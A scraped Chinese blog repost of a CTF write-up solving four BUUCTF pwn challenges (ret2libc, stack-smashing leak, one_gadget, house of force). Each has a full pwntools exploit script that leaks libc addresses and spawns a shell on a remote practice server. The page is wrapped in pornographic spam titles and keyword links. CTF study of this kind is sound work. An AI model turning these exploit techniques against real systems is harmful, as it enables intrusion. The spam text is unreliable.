日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

PWN-PRACTICE-BUUCTF-24

發布時間:2023/12/10 编程问答 34 豆豆
生活随笔 收集整理的這篇文章主要介紹了 PWN-PRACTICE-BUUCTF-24 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

PWN-PRACTICE-BUUCTF-24

    • cmcc_pwnme1
    • wdb2018_guess
    • oneshot_tjctf_2016
    • gyctf_2020_force

cmcc_pwnme1

棧溢出,ret2libc

# -*- coding:utf-8 -*- from pwn import * #context.log_level="debug" io=remote("node4.buuoj.cn",27883) elf=ELF("./pwnme1") libc=ELF("./libc-2.23-16-x32.so") puts_got=elf.got["puts"] puts_plt=elf.plt["puts"] main=0x080486F4 #getflag=0x08048677 io.sendlineafter(">> 6. Exit \n","5") io.recvuntil("Please input the name of fruit:") payload="a"*(164+4)+p32(puts_plt)+p32(main)+p32(puts_got) io.sendline(payload) puts_addr=u32(io.recvuntil("\xf7")[-4:]) print("puts_addr"+hex(puts_addr)) libc_base=puts_addr-libc.sym["puts"] system=libc_base+libc.sym["system"] binsh=libc_base+libc.search("/bin/sh").next() io.sendlineafter(">> 6. Exit \n","5") io.recvuntil("Please input the name of fruit:") payload="a"*(164+4)+p32(system)+p32(main)+p32(binsh) io.sendline(payload) io.interactive()

wdb2018_guess

stack smashing,參考:wdb2018_guess stack smashing

# -*- coding:utf-8 -*- from pwn import * #io=process("./GUESS") io=remote("node4.buuoj.cn",25593) elf=ELF("./GUESS") libc=ELF("./libc-2.23-16-x64.so") puts_got=elf.got["puts"]io.recvuntil("Please type your guessing flag\n") payload="a"*0x128+p64(puts_got) io.sendline(payload) io.recvuntil("*** stack smashing detected ***: ") puts_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00")) print("puts_addr=="+hex(puts_addr)) libc_base=puts_addr-libc.sym["puts"] libc_environ=libc_base+libc.sym["__environ"]io.recvuntil("Please type your guessing flag\n") payload="a"*0x128+p64(libc_environ) io.sendline(payload) io.recvuntil("*** stack smashing detected ***: ") stack_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00")) print("stack_addr=="+hex(stack_addr))io.recvuntil("Please type your guessing flag\n") payload="a"*0x128+p64(stack_addr-0x168) io.sendline(payload)io.interactive()

oneshot_tjctf_2016

通過puts_got泄露puts的真實地址,計算libc基地址,進而計算one_gadget地址
發送one_gadget地址,程序跳轉執行

from pwn import * #context.log_level='debug' #io=process('./oneshot_tjctf_2016') io=remote('node4.buuoj.cn',29453) elf=ELF('./oneshot_tjctf_2016') libc=ELF('./libc-2.23-x64.so') io.recvuntil('Read location?\n') io.sendline(str(elf.got['puts'])) io.recvuntil('0x0000') puts_addr=int(io.recvuntil('\n')[:-1],16) print(hex(puts_addr)) libc_base=puts_addr-libc.sym['puts'] onegadgets=[0x45216,0x4526a,0xf02a4,0xf1147] one_gadget=libc_base+onegadgets[0] io.recvuntil('Jump location?\n') io.sendline(str(one_gadget)) io.interactive()

gyctf_2020_force

house of force
參考:寒假訓練 gyctf_2020_force (2/250)

# -*- coding:utf-8 -*- from pwn import * #io=process("./gyctf_2020_force") io=remote("node4.buuoj.cn",26484) elf=ELF("./gyctf_2020_force") libc=ELF("./libc-2.23-16-x64.so")def add(size,content):io.sendlineafter("2:puts\n","1")io.sendlineafter("size\n",str(size))io.recvuntil("bin addr 0x")chunk_addr=int(io.recvuntil("\n")[:-1],16)io.sendlineafter("content\n",content)return chunk_addr#gdb.attach(io) #pause()addr0=add(0x200000,"aaaa")#當需要分配的chunk很大時,top chunk的size不能滿足需要,程序會使用mmap來分配chunk#由mmap分配的chunk的地址與libc的基址有著固定的偏移,于是可以計算libc的基址 libc_base=addr0+0x200ff0 malloc_hook=libc_base+libc.sym["__malloc_hook"] realloc=libc_base+libc.sym["realloc"] print("malloc_hook=="+hex(malloc_hook)) print("realloc=="+hex(realloc)) payload="a"*0x18+p64(0xffffffffffffffff)#將top chunk的size改寫成非常大的數,由于檢測時要轉換為無符號數,一般改寫成"-1" addr1=add(0x10,payload) top_chunk=addr1+0x10#top chunk的地址,是prev_size的其實地址,house of force必須知道top chunk的地址 print("top_chunk=="+hex(top_chunk)) offset=malloc_hook-top_chunk-0x33 #這里的0x33是為了使變化后的top chunk指向一個滿足字節對齊的地址,而且盡可能離目標地址近一些#pause()addr2=add(offset,"bbbb")#這里top chunk的地址還沒變,這個chunk還是在現在的top chunk指向的地址#從top chunk中分配chunk,會改變top chunk指向的地址,這里給一個偏移,然后top chunk就能指向離目標地址很近的一個滿足字節對齊的地址 print("addr2=="+hex(addr2))#pause()gadgets=[0x45216,0x4526a,0xf02a4,0xf1147] one_gadget=libc_base+gadgets[1] payload="a"*8+p64(one_gadget)+p64(realloc+0x10)#這里就是在新的top chunk指向的地址分配chunk了#小細節:__malloc_hook-8=__realloc_hook addr3=add(0x10,payload)#pause()io.sendlineafter("2:puts\n","1") io.sendlineafter("size\n",str(0x10))#這里的調用流程為:malloc->__malloc_hook->realloc+0x10(平衡棧,滿足one_gadget的條件)->__realloc_hookio.interactive()

總結

以上是生活随笔為你收集整理的PWN-PRACTICE-BUUCTF-24的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 97免费人妻无码视频 | 国产一级片a | 国产1区| jizzjizz国产 | 一区二区三区四区在线视频 | 黄色免费网站在线 | 欧美日韩xxxx | 香蕉网址| 伊人射| 国产三级第一页 | 亚洲一级黄色片 | 一二三区中文字幕 | 国产又粗又长又爽 | 国产成人精品免费看视频 | 中文字幕一区二区三区免费看 | 免费裸体视频女性 | 一区二区三区精彩视频 | 国产亚洲欧美一区二区三区 | 男人午夜天堂 | 九九九视频在线观看 | 99在线免费 | 黄色免费在线观看网站 | 国产精品日韩专区 | 亚洲免费观看高清完整版在线 | 91久久精品一区二区 | 国产乡下妇女做爰 | 性做久久久久久 | 日韩精品一区二区在线视频 | 福利姬在线观看 | 亚洲欧美日韩国产 | 国产高清视频免费 | 91艹 | 日韩三级在线观看 | 欧美日韩精品一区二区三区四区 | а天堂中文在线官网 | 久久网址 | 西西4444www大胆无视频 | 青青草一区 | 国产免费高清视频 | 女上男下动态图 | 已满18岁免费观看电视连续剧 | 顶级黑人搡bbw搡bbbb搡 | 捆绑调教在线观看 | 国产精品蜜臀av | 亚洲网在线观看 | aaa在线视频 | 91久久精品一区二区三区 | 日韩av成人在线观看 | 在线色 | 中文精品久久久久人妻不卡 | 黄色av免费| www.狠狠干| 日韩欧美猛交xxxxx无码 | 香蕉视频97| 青青伊人久久 | 国产一级高清 | 亚洲激情视频在线播放 | 污视频在线观看免费 | 欧美理伦少妇2做爰 | 国产精品jizz在线观看美国 | 亚洲福利精品视频 | 窝窝午夜理论片影院 | 亚洲熟妇国产熟妇肥婆 | 在线观看亚洲网站 | 国产婷婷在线视频 | 免费看的一级片 | 日韩成人黄色 | 亚洲精品视频导航 | 欧美三区四区 | 18+视频在线观看 | 欧美综合视频在线观看 | 菲律宾黄色片 | 日韩精品在线视频免费观看 | 国产精品国产三级国产专区51区 | 日韩免费视频一区二区视频在线观看 | 色综合欧美 | 麻豆porn| 日韩精品一区二区三区av | 欧美国产中文字幕 | 青青艹视频 | 国产精品自拍区 | 日韩免费高清视频 | 四虎久久久 | 亚洲h视频在线观看 | 欧美一区二区三区爽爽爽 | 青草精品视频 | 国产在线观看免费视频软件 | 亚洲成人影音 | 欧美理论片在线观看 | 少妇av导航 | 久草视频国产 | 欧美你懂的 | www.爱爱.com| 日本少妇videos高潮 | 色女人影院 | 国产成人精品无码片区在线 | 日本美女毛片 | 亚洲色图20p | 亚洲色欧美另类 |